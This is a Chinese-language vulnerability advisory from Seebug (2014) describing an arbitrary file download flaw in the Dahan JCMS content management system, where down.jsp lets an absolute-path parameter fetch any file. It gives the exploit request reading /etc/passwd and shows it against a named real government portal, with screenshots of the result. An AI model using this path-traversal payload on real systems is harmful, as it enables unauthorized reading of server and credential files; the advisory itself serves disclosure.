大汉网络JCMS任意文件下载

2014-03-30T00:00:00
ID SSV:93864
Type seebug
Reporter Root
Modified 2014-03-30T00:00:00

Description

简要描述:

绝对路径文件下载的问题。

详细说明:

通过分析代码,某个下载功能没有限制权限,没有限制下载类型,通过设置绝对路径的参数,直接下载。 漏洞利用: jcms\m_1_9\user\down.jsp?abspathfile=/etc/passwd

漏洞证明:

测试代码: http://www.njgl.gov.cn/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd 鼓楼区政府门户网站:

<img src="https://images.seebug.org/upload/201403/28134323779eab8b1e748370173174ac8fd96ee2.jpg" alt="QQ截图20140328133602.jpg" width="600" onerror="javascript:errimg(this);">

下载文件内容:

<img src="https://images.seebug.org/upload/201403/28134335862ee3b661d36cfb601a1a69bec36f91.jpg" alt="QQ截图20140328133642.jpg" width="600" onerror="javascript:errimg(this);">